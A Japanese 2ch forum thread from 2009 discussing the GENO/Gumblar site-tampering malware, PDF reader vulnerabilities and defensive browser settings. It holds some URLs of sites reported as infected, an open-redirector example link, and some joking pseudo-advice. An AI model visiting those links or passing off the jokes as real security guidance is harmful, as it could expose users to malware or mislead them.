ttp://www.dotup.org/uploda/www.dotup.org107518.jpg.html

いまどきトロイの木馬なんて古過ぎる三角木馬にしておけ

こんなユーモアも糞も無い最低なレス久しぶりに見た

お前もしかして王子か？

木馬王子か
最悪過ぎるネーミングだ……

木場王子かﾜﾗｗｗ＾＾

>>803
おまえはGENOスレだけにゲロ王子だな。

王子乙

ウィキペディアにあやしげなものが

http://ja.wikipedia.org/wiki/%E7%89%B9%E5%88%A5:%E4%BC%9A%E8%A9%B1%E3%83%9A%E3%83%BC%E3%82%B8

グーグルで検索しようとしたらこうなった。
↓

... コンピュータ ウィルスやスパイウェア アプリケーションの自動リクエストと類似したクエリが送信されました。
ユーザーを保護するため、このリクエストをすぐに処理することはできません。

できるだけ早くアクセスを復旧しますので、しばらくしてからもう一度お試しください。
お使いのコンピュータやネットワークがウィルスの被害にあっていると思われる場合は、
ウィルス チェッカーやスパイウェア削除ツールを実行して、システムからウィルスや不正ソフトウェアを駆除してください。

最近落ち着いてきたな
対策分かればもう大丈夫か
始めに感染しちゃった人はご愁傷

>>808
http://whois.nic.ad.jp/cgi-bin/whois_gw?type=&key=202.222.48.3
うわ、大変だ。
どうすれバインダー






http://japan.cnet.com/marketing/story/0,3800080523,20370562,00.htm

ちなみにこんなの
http://ja.wikipedia.org/wiki/%E5%88%A9%E7%94%A8%E8%80%85%E2%80%90%E4%BC%9A%E8%A9%B1:202.222.48.3

もう解決してない？
普通に飛べたんだけど…

>>811
何をさっきからひとりで騒いでるんだよ？
どれもまったく問題なく開けるぞ。
Googleの検索ワードは何？

>>808のメッセージはお前のPCがウィルス感染の疑いありで、変なクエリーも
お前のPCから送信されているように読めるんだが。

「http://ja.wikipedia.org/wiki/%E7%89%B9%E5%88%A5:%E4%BC%9A%E8%A9%B1%E3%83%9A%E3%83%BC%E3%82%B8」
というのをグーグルで検索したんでしょ。

そんなもの検索してどうなるんだ

「http://ja.wikipedia.org/wiki/%E7%89%B9%E5%88%A5:%E4%BC%9A%E8%A9%B1%E3%83%9A%E3%83%BC%E3%82%B8」
というサイトが出てくるんじゃね？

>>815
そのページにウィルスかスパイウェアでも仕込まれている可能性でも考えたんじゃね？

■ おすすめ２ちゃんねる 開発中。。。 by FOX ★
このスレを見ている人はこんなスレも見ています。(ver 0.20)
GENOウイルススレ　感染4台目 [インターネット]
【ｳｲﾙｽ】GENOを語るスレ31【完治】 [パソコン一般]
【報告専用】同人サイト向け・GENOウィルス注意11 [同人]
乙女＆BL＠【公式感染】GENOｳｲﾙｽ注意喚起ｽﾚ2 [女向ゲー一般]
【ｳｲﾙｽ被害】GENOを語るスレ32【謝罪なし】 [パソコン一般]

おまいら！うｐだてしておけよー

Adobe Reader 9.1.2 Update - Multiple Languages
ttp://www.adobe.com/support/downloads/detail.jsp?ftpID=4486

2009 年 6 月のセキュリティ情報
ttp://www.microsoft.com/japan/technet/security/bulletin/ms09-jun.mspx

なんかもう割とどうでもいい

readerとは縁を切ったから俺もどうでもいいな
そんな事よりflashの方をupdateしろと

>>819
これ入れたらもうJavaScriptは有効にしていいん？

JavaScriptは基本的にOFF

acrobat readerでjs使わないでしょ普通

アドビッチのアプデは低速回線には辛いんだけど。

低速回線のやつが蔑称使うなよ情けない

acrobat readerなんてゴミアプリはそもそも不要

社内、支社中をAdobeのアップデートしたばかりなのに

またかょ・・orz

>>824>>827
acrobat readerじゃない、Adobe Readerだ。

でもレジストリには未だにAcrobat Readerで登録されてるんだよね・・・
Adobe側もちゃんと統一しろよ、と。

GENOウイルスまとめ
http://www29.atwiki.jp/geno/pages/13.html

の、左側メニューの「その他」にある

Googleキャッシュにはウィルスが残っているものがあるので注意が必要です

のリンクが危険と出るのですがウイルスなのでしょうか？

rel="nofollow"

ttp://blogs.technet.com/jpsecurity/default.aspx
＞また、国内で Geno等を拡散しているWebサイトが（略

ここでもGenoと言えばマルウェアの名前ってことで認識されてるね

genoでググると公式サイト以外全部ウィルス関連
もう名前変えるしかないだろこの店

※既に一回変えてます

>>835
一体何やらかしたんだ

>>834
genoをgenoxなどに名前変えると、
genoウィルスもそれにあわせて名前かえるべきだろか、genoxウィルス

桃の缶詰を買おうと思いまふ＞Geno


閲覧しちゃったけど、平気？

自己責任で・・

>>836
倒産

GENOウイルスのサイト改ざん被害、国内で400件以上確認される
http://internet.watch.impress.co.jp/cda/news/2009/06/12/23779.html

無事感染してることを確認したんですが横に
sqlsodbc.chmxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
とかいうファイルがあって吹いた

おまえ頭大丈夫か？

■ おすすめ２ちゃんねる 開発中。。。 by FOX ★
このスレを見ている人はこんなスレも見ています。(ver 0.20)
GENOウイルススレ　感染4台目 [インターネット]
【報告専用】同人サイト向け・GENOウィルス注意11 [同人]
【ｳｲﾙｽ】GENOを語るスレ31【完治】 [パソコン一般]
【ｳｲﾙｽ被害】GENOを語るスレ32【謝罪なし】 [パソコン一般]
乙女＆BL＠【公式感染】GENOｳｲﾙｽ注意喚起ｽﾚ2 [女向ゲー一般]

>乙女＆BL＠【公式感染】GENOｳｲﾙｽ注意喚起ｽﾚ2 [女向ゲー一般]

男A「僕のPCが、GENOに感染しちゃったんだ・・・」
男B「何だって！？それは大変だ！よし、ちょっと見てやるから今すぐお前の家に行くぞ」

>>845
それはいいけど、なぜあっちのスレのおすすめ２チャンネルにあの胸糞悪いスレの名が？
まあ騒ぎを沈静化しようと警笛ならしてた人もいるから、そっち側の人ならいいんだけど

>>846
それネタとして成立してるのか微妙だな

暫く来てなかったんだが同人が騒いで18スレも伸びたのか？

大体あってる

ところで、GENOに汎用リダイレクタが置いてあるんだが。

http://www.geno-web.jp/junction.html?link=http://www.google.co.jp/

（ﾟ�听）ｲﾗﾈ

>>851
汎用リダイレクタは、接続先ドメインで安全確認する際に、リダイレクタ設置サイトで偽装できるって脆弱性
要る要らないじゃなくて、危険物
とはいってもそれを気にする奴に今更GENOを信用する奴はいないわけだが

googleも昔置いてたが、途中からクッションページで止まるように改善(リファラ隠しに使ってた人には改悪)された
I'm Feeling Luckyで飛ぶけどな！

&btnI 使ってブラクラかなんか踏ませるイタズラが瞬間風速的に大人気になった結果…

…&btnI のトップが勇気スレになったことがあるｗ

>>852
そんな情報いまさら（ﾟ�听）ｲﾗﾈ
って意味だとは思わないのか
教えてちゃんきめえ

ここでaviraが反応したんだけど、皆反応する？
://www.e87.com/selection/sp_father/
（安全のためにhttp抜きました）

>>855
hxxp://s.nakanohito.jp/bc/bivalves.js
これかな

>>856
そうです、それです。ウイルス名を検索かけてもaviraのデーターベースにないので
もしかしたらGENOウイルスがまた改変して戻ってきたのかな、と

>>857
ttp://www.ideaxidea.com/archives/2008/12/userinsight_1.html
スレチだけど誤検知と見ていい
ただのアクセス解析で害は無いと思う

avast!が警告出したので鑑定スレで見てもらったら
「不正スクリプトが埋め込まれています。
通称 GENO ウイルスですが、接続先のドメインへは既に接続できなくなっています。
一応、PC有害。」だそうです。
感染しなかったから良かったものの、ただのそうめんのレシピサイトなのに・・・

（注意）　ttp://www.mennoyamaichi.co.jp/soumen/recipe/index.html

確かにそれっぽい物が埋め込まれてるな

>>859
でた
Trojan-Downloader.JS.Gumblar.a

>>859
HP管理者への警告メール完了。

>>862
お疲れ様です！
検索でも上の方に出て季節的にも踏む人がいるかもしれないから
ちょっと心配しながらも、ドメインへの接続ができなければ大丈夫かな？と
放置してしまってました。対応ありがとうございました。

意外なジャンルへも広まってますね・・・

呪いのビデオの様に広まって行ってたみたいだから
ジャンルはあまり関係無いかと思われる

新種のWebサイト改竄攻撃「Nine-Ball」…既に4万サイト以上で確認
ttp://internet.watch.impress.co.jp/docs/news/20090617_294384.html

めんどくせーけどチョロメに変えようかな

最近サイト改ざん多いなぁ

GENOより強力な新型が出現したみたいだけど
これって、Acrobat Reader のJavaScript実行をOFFにしていても防げないの？
↓　　↓　　↓　　↓　　↓　　↓　　↓　　↓　　↓　　↓　　↓　　↓　　↓　　

〓PDFの脆弱性をつくアダルトサイトに要注意--G Data Softwareが警告〓
http://japan.cnet.com/news/sec/story/0,2000056024,20395086,00.htm

＜抜粋＞これらのサイトはインラインフレームを含んでいるため、PDFファイルを埋め込むことが可能になっている。
実際にPDFが表示されるわけではないが、 PDFの脆弱性を利用してユーザーにマルウェアを送り込むことから、
通常は「PDFウイルス」と呼ばれている。リンクされているPDF文書は中国にあるサーバに置いてあり、ユーザーが
アダルトサイトのページを開いた瞬間に、AcrobatのプラグインがそのサーバーらPDFを読み込もうとして、実際には
ウイルスをロードしてしまう。

5月に世界的大流行したJSRedir-R/Gumblarの教訓
http://itpro.nikkeibp.co.jp/article/COLUMN/20090611/331787/

今回利用されているパスワード・スティーラはws_32.dllをフックしているという。
ws_32.dllを悪用すると，例えば通信が発生した場合だけキー入力を
取得するように仕込むことができる。
つまり，システムがデータを暗号化する前に情報を詐取しているということだ。
このためSFTP（セキュア FTP）を利用していても，安全というわけではない。

>>21
確実に治ってないな、それ
AcrobatReaderをどうにか消せないか？
実行部分だけでも起動しないように出来ればそれ以上被害は出ない
ただ感染したままだけど

>>868
表示されないってのは表示領域が0なだけだとおもう
その文章だけじゃわかんないけど既存の脆弱性なら
最新バージョンの使用およびReaderのJavaScriptオフで大丈夫じゃないかな

つーかエロサイトはそれ以外もいろいろあるから心配なら控えましょう
控えるのが無理なら対策を勉強するかPCを投げ捨てれば大丈夫です

>>870
>>27

>>866
いづれWindowsXP＋クロームあたりも狙われるかもしれないから、
念のためにWindows7＋クロームのユーザーエージェントを入れて使えよ
Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.31 Safari/530.5
これで貧弱なXPがWin7へと見た目だけ偽装できるｗ

もうAdobeアンインストールしようかな
他になんか軽くて良いのがあったよね

もうPDFとフラッシュは見れ無くてもいいよ

まだfoxit readerに乗り換えてない情弱がいるのか

>>875
foxit readerもかよ…
ttp://www.itmedia.co.jp/enterprise/articles/0903/10/news029.html
ttp://hotsecurity.jp/detail/1903/

乗り換えた先のアプリに脆弱性が存在したら結局意味ないんだよな
せいぜい普及率の低さ逆手に取るくらいしかメリットがない

>>875
＞情弱がいるのか

つ【鏡】

いちいち「情弱」って語に反応するなよ　コンプ丸出し

それ位でムキになんなよ

確かにｗ

>>879
何むきになってのwww

なんだ図星か

>>882
落ち着け

別にfoxit readerがスタンダードじゃねーし
得体の知れないウィルスごときで皆で一斉に乗り換えるのも馬鹿らしいわな

＞得たいの知れないウィルスごときで

何故コピペしなかった？

888！

>>887
技術不足

技術不足かよｗ

コンプティーク丸出しの意味がわからない

>>889
勝手に返事するな

ばかばっか

>>893
何むきになってのwww

なんだ図星か

無限ループって怖くね？

えっ

きも

さっきから情弱が必死になってるな

情弱ってそんなに悪いことなのか？

火狐とIEではしくみが違っているんだよな
一応、Adobeリーダーがpdfを自動で読み込まないように火狐とIEの設定を変えてみた

>>899
何むきになってのwww

ジェノウイルスはマジやばい

>>876
genoウイルスでfoxit readerに乗り換えた時には修正されてたのか

今後Adobeリーダーのどのような脆弱性を狙ってくるか解らないから自動読み込みは禁止だな

PDF 閲覧ソフトいろいろ試したけど
Adobe Reader 以外だと表示が崩れることがあるから
基本的に Adobe Reader かなー
いったん起動してしまえば軽いし

めったにつかわないんだから、Readerのプラグインだけやめればいい
問題はゼロにならないが、だいぶちがうとおもわれ

次スレもこのスレタイでいくん？

ttp://iida.jp/calling/

genoどころかおそらくウィルスとは無関係だが
下手するとそれ以上にたちの悪いページ
一体、何考えてんだ？

スクリプト全般を動作できないようにすれば解決するのにな

>>847
ネタとして成立させるならこうだな


男A「僕のアナルが、GENOに感染しちゃったんだ・・・」
男B「何だって！？うほっ！それは大変だ！よし、ちょっと見てやるから今すぐお前の家に行くぞ」

>>869
>つまり，システムがデータを暗号化する前に情報を詐取しているということだ。
>このためSFTP（セキュア FTP）を利用していても，安全というわけではない。
これは嘘か誤解か情報不足だな。
キーロガーのトリガとして使うって意味に取れるが、SFTPクライアントにパスワード記憶させてるケースなら、パスを抜けない。
記憶させなくとも、接続前にパスワードを先行入力した場合も抜けるかは怪しいな。
周辺を辞書化してアタックするのかね？

９．１入れたらｐｄｆ見れなくなったから８に戻したよ
まじうぜーよ糞だなアドビ

【社会】新種のWebサイト改竄攻撃「Nine-Ball」…既に4万サイト以上で確認
http://tsushima.2ch.net/test/read.cgi/newsplus/1245214783/

レンタル鯖のファイルマネージャなら大丈夫という話を
聞きましたが、本当でしょうか？

皿うどん食いてぇ

ttp://www.e-nagasaki.com/shops/nousan/chan/60320102/image_002.jpg

食いもんがネットで落ちてくるようになんねーかな

今開発してるからもうちょっと待ってて

ラーメンでけた

これって情弱とか言ってる自称情強が結構感染してんだよな

情弱って、板やスレの平均知識より低いとか煽りたい相手が自分より知識が劣ってる点を卑下する2ちゃん用語で
しかも特定の板でしか用いられないもんだから、進んで多用したがるような動機のある奴は
実際情報弱者の類に入るケースが多いんだよな

今大変なことになっている新種のウイルス「Nine-Ball ナインボール」を検出できるのはわずかのベンダーのソフトのみ（米セキュリティ企業公表）

http://www.virustotal.com/analisis/62254bf6a13a438bc53c0f3745c622c5c1604aa37e4f866036a1e94c35cc68f7-1245137075

マルチうぜえよ

XP IE8でも設定次第でGENOウイルスやナインボールは防げるよね

>>924
情弱は他のブラウザやPDFリーダーなどに逃げる傾向にあるな
そして乗りかえた先の脆弱に陥るのが情弱でもあるがｗ

ぜいじゃくじょうじゃくきじゃくせいー

政府にせよ自治体にせよ交通各社にせよ、何でもかんでもpdfファイルにしてくれるもんだから、困る。
GENOウイルス云々以前に、重いんだが…ここまでpdfばっかなのは何でだ。

>>927
それは閲覧する環境を整えるのに無駄な経費と無駄なライセンス料を払う必要が無いからだろ
なによりOSに依存しない電子ドキュメントを選ぶならPDFが一番扱いやすいわけだし今更選択肢など他には無い

>>928
デシャビューがある

契約書、拝見しました。ような気がします。昨日寝ながら。みたいな

>>928
ああ、そうか…やっぱりそういう事情か…。
教えてくれて、ありがとう。

余計な拡張機能をつけないでPSファイルをもっと推進してくれれば良かったのに。

余計な機能を追加し続けるから、ある程度新しいリーダを入れ続ける羽目になるし、
ある程度新しいと余計な機能ゆえに脆弱性も多くて神経質なアップデートを強要されるし、
神経質にアップデートしてもゼロデイ攻撃がゴロゴロ起きる上に対策がスクリプト機能を手動で殺してください、じゃどうにもならん。

昔からあるPNGとかJPGとかRIFFを見習って、コア機能と拡張機能は分離してパース出来るようにしろっての

今更そんな事いってどうするよ。PDFのフォーマットが確率するまえにいっとけよ。

今後も余計な機能を追加し続けるに1ペリカ

冷蔵庫がつくのはいつになるかなwktk

そのうちASIMOがPDFを読み上げるんだろ

何か完全に収束したって感じね

ジスレいらんよ

MS 謹製の XPS の普及に期待
現状ではファイルサイズもビューアの重さも表示や印刷の品質もクソだけどｗ

>>924
IE8は未対応のページが多いとい言う致命的な問題があるから論外

>>910
ネタとしては成立してるけど、清廉なセキュ板のレスとしてはお下劣ですぅ＞＜
スポーツ新聞のエロ面のワールドジョークとしてならバッチリ(^_^)v

そんなあなたに おすすめのスレ
http://pc11.2ch.net/test/read.cgi/sec/1242582100/

くだらん

>>938 とりあえず、次俺らどこに移動するん？ だいたい落ち着いてるし、手堅くセキュ板？

ってあれっ、ここがセキュ板か インターネッツ板かと

インターネッツ板のスレが、比較的ふいんきが近い 残り60%くらい
あるいは、zlkonウイルス擦れ ってのがこの板にあって、これが残り95%

作った人ってもう捕まった？

ウイルス上等

[email protected]

>>946
童貞を卒業出来なくなる魔法をかけました。

http://google.com/[email protected]
[email protected]の検索結果 15 件中 1 - 10 件目 (0.42 秒)
すっかり記録されてやんの。

イタズラで晒されたんだろうね、ウイルスのかわりに、SPAMがわんさか来るよ お気の毒に

他人のメールアドレスを晒してるんじゃね

adobeに限らずPDF Readerのjavascript関連には脆弱性がたっぷり含まれていたわ
adobeはブラウザから無効にならなかったり、他のPDFはJSをOFFにしても無効にならない場面があったりする
セキュリティを固めたつもりがフヌケだったという、これらも脆弱性のひとつだろうな

MS、無料ウイルス対策ソフトを23日公開
http://www.afpbb.com/article/environment-science-it/it/2613105/4282627

またか。MS謹製の対策ソフトは弊害が多いからスカン。前に出たのはOEを壊されたりしたしな

そんなことよりOSとかオフィスとか安くしろよ

お断りします。

>>954
個人が買うもんじゃないから。特にオフィス。
OSも定価では買わないｗ OS付きの中古かな

お前がどこで買おうとどうでも良いよ
そんな話誰もしてないし興味ない

また嘘クソ垂れ流しのテンプレで立てたな
よくやるわ

GENOはもう良いだろ

もういりまへんわ

わてほんまによういわんわ

　　　　　　　　　　　　 ,r‐―‐-､
　　　　　　　　　　　／　　　　　 ＼
　　　　　　　　　 ／　　　,ｨ 　 　 　 ヽ
　　　　　　　　　i'　　　_.j_,j,rj_j,:､_　､ l
　　　　　　　　　iﾄ､._j'ji !! ｧ-､ !j !;l! ﾄヽ,　　　　
　　　　　　　　　 ( .`t.!!／ _!.ヽ='ｲi ,'　 ） 　 　 ／￣￣￣￣￣￣￣￣￣￣￣￣
　　　　　　　　　 ヽヽ,j 　 ,--､ 　j　r ｨ~＼　　 |　　まだだっ！まだ終わらんよ！
　　　　　　　　　　 ）ヽヽ. ﾞ＝' ／l　　)ーi l　＜. 　
　　　　　　　　　　 ﾞt　j ｀ー‐'　 ｣　 iﾄ-'~i !. 　 ＼＿＿＿＿＿＿＿＿＿＿＿＿
　　　　　　　　　　　l　 ﾌ┬┬i'~二'iﾉ二ｿﾉ.
　　　　　　　　　　　liブ　,i　i　!└┘!__//＿
　　　　　　　　＿,.:ウﾞｰ､j__j__jr-‐‐'''ー----｀ｴー､_
　　　　　　_／　／　　 i'　i'　i'　　　　　　　 /　 ＼　ヽ
　　　　　/　ﾄ-'"　　　,i'　i'　i'　　　　　　　/　　　　ヽ. ）
　　　　 i'　 l!　　　　　!　 !　!　　　　　　　j ,il　　　,.r'~ヽ
　　　　,ﾄ､　l　　　　　!　 !　,!　　　　　　 /　i　 ／　i　 ﾉ
　　　　!　ヽ,!　　　　　!　!　ﾞi　　　　　　,i　　ﾚ'　　　ヽ ヽ
　　　（ j　　'!　　　　　!　!　 !　　 　 　 j　　 ,｢　 ,.:='',Tﾞｲ
　　 　 ｴー-i､　　　　j　,!　 i!　　　　　l　　/∧,/　　ヽ. !
　　　 .i!　　　 ＼　　 !　!　　!　　　　　 !　,i i　ヽ　　　＼!
　　　 .ｉ　　　　 k'　　 !　!　　i.　　　　　j　j i'　　!　　　　ヽ.
　　　　!　　　 ,ﾈ､　　j 十＝=）j　　　,ﾉ　! j　　 ＼　　　　）
　　　 ﾉj　__, ,八　　く__｣_,.='子‐-ｧ､｣ ／/　　　　 ﾞv'＿＿!
　　 //　　　,!　 ]￣く　　く￣￣~｢｢>'^Y　　　　　 /　_＿__）
　 _凡､_　　_ﾉ　j_,.-‐'t‐‐'ﾅーt‐‐｢j　　l　　　　　 ﾚ'"　　　 i
　l/~`ーﾆﾆj　/　　　,!ｰ十'"｀T"~~^TTﾞi　　　　　l　　　　　l

ＪＳオフ、iframe,フラッシュオフ、アドビリーダーアンインスコで不便でしゃーないわ

>>963
JavaVMは消したかい？

あとまぁ、只のHTMLでも解釈ミスでやられるって例もあったし、JPGのデコードエラーで感染するってのもあったよな。


・・・1CD Linuxとか、CDブートWindowsとか、VMとか、ブラウジングはそういう環境でのみ実行するって決め打ちするほうが案外楽かもな

>>859
もう無害化されてんの？
何も出ないんだけど。

CDブン回してネット見るとかもうね
単に書き込み禁止にしてれば良いだろ

テキストブラウザでいいよ

>>966
usbなら速い

>>961
買物ブギ

>>966
無知な俺にHDDを書込み禁止にする方法を教えてくれ

>>970
HDDを容量限界まで食い尽くせ。物理的に書き込みしたくても出来なくなる。

>>970
アクセス権かな？
ファイルシステムによるんだろうけど

>>970
nomore.comを実行。その後は書込めなくなる。
なにかを削除しちまえば書込めるのが嫌だっていうなら、物理的に引っこ抜け。

>>971-973
皮肉で言ってるんだけどな・・・
ファイルサイズを食い尽くそうがファイルシステム側でロックしようが、ウィルス・マルウェアが攻撃目的で削除・変更するのを防げるわけではないだろ。
引っこ抜いたら読み込みも出来ねぇよ。

せめてReturnilを挙げる位してくれ。

過剰反応

>>974
悪意のある文章だｗ
罠にはめようと（ry

>>974
防げるよ

この数行のレスを生半可な知識で行うと大変な目にあう

初心者向け、は終わったんだから、どうなろうとめいめい自分で始末しろってこった
露出しちゃうの以外は、どうにもならないってことはないだろ

万年初心者に簡単で効果的な方法を教えたが
マジ疲れた…

てかフォルダとファイルの違いくらい分かれつーの

厳密にはフォルダもファイルの一種です、
フォルダは特殊なファイルです
とは説明してあげないの？

おっさんはフォルダのことをディレクトリと言います。

フォルダ風のexeをクリックするのはエロおやじ

>>981 ファイルとして開きたいお！とか言う人なら萌えられる

もう全部ショートカット化して
デスクトップにアイコン並べれば良いと思うよ

きたねぇなぁ

>>985
でも画面が800×600では・・・

デスクトップのアイコンが汚いので、ﾏｲｺﾝﾋﾟｭｰﾀとゴミ箱だけ残して、あと全部Quick Launchへフォルダわけして置いている。
コレが意外とベンリでね。スタートメニューのショートカットも全部Quick Launchへ移動させているという。

そうですか

　＿＿＿
/　||￣￣||　┌―.┐／￣＼
|.....||＿＿||―|――|‐⌒’|`⌒　それからどした・・・
|￣￣＼三⊂/￣￣￣/〇
|　　　　|　( ./　　　　 /

　＿＿
/　||￣.／￣＼.┌―.┐
|.....||＿⌒’|`⌒‐|┰┰|―　 それからどした！？
|￣￣＼三⊂/￣￣￣/
|　　　　|　( ./　　　　 /

　　　　／￣＼.┌―.┐♪
　＿_  ⌒’|`♪‐|┰┰|‐∩
/　||￣￣||　ｒ _. |⊂⊃|　ﾉ　　それからどした？
|.....||＿＿|| └‐ ﾑﾑﾑﾑﾚ´｀ヽ　　　それからどした？
|￣￣＼三　 /￣￣￣/ノ´｀　♪
|　　　　|　( ./　　　　 /

　　　　　　　　　　　　　　　／￣＼.
　　　　　　　　　　　　　　　⌒’|`⌒
　＿＿＿ 　　　　　　　♪　　∩┌―.┐
/　||￣￣||　　　　　　　　　_  ヽ‐|┰┰|‐7　　 それからどした？？
|.....||＿＿|| 　　　　　　　　/｀ヽJ  ⊂⊃|┘　　　それからどした？？？
|￣￣＼三　 /￣￣￣/ 　´｀ヽ､ﾑﾑﾑﾑ
|　　　　|　( ./　　　　 / 　　　　　｀) ）　♪

>>983
誰でも初心者の頃一回はやるものだと思ってた

で、次スレはインターネット板の方か？

アフィテンプレのとこは無視の方向で。

もういらん

めいめいすきなところに移動汁 以下順不同

GENOウイルススレ(Gumblar,Martuz,JSRedir-R) ★22
http://pc11.2ch.net/test/read.cgi/sec/1245402584/

GENOウイルススレ 感染4台目
http://pc11.2ch.net/test/read.cgi/internet/1243050166/

zlkonウイルス擦れ
http://pc11.2ch.net/test/read.cgi/sec/1242623934/

http://find.2ch.net/?STR=GENO

9.1.2がきたら表記帰るかと思ったらそうでもないのか
9.1.0でいいんですけどね

>>994
(`д´ )ゞラジャ

>>994
一番上はアフィ野郎のスレだから除外しとけ。

次スレ
GENOウイルススレ　★22
http://pc11.2ch.net/test/read.cgi/sec/1245640557/

　　　 ∩＿＿＿∩
　　　 | ノ ,,.ノ　ヽ、ヽ
　　 /　u　― 　 ―　|
　　 |　　　　( _●_)　.|　　　困ったクマー
　　彡､　 　　ヽノ　　ミ
　/　　　　 ∩ノ ⊃　 ヽ
　(　 ＼　／ ＿ノ　|　 |
　.＼　“　　／＿＿|　 | 　　　 　 ○＿○
　＿　＼ ／＿＿＿ ／＿＿＿__(´(ｴ)｀)＿＿ｺﾏｯﾀｸﾏｰ
　＿　＿　＿　＿　＿　＿　＿　__U　_U　＿　|
　　| |　 | |　| |　 | |　| |　 | |　 | |　 | | 　| |　| |
　　| |　 | |　| |　 | |　| |　 | |　 | |　 | | 　| |　| |
　　| |　 | |　| |　 | |　| |　 | |　 | |　 | | 　| |　| |

1000なら次々スレで「Vistaの人はは」が直りますように

このスレッドは１０００を超えました。
もう書けないので、新しいスレッドを立ててくださいです。。。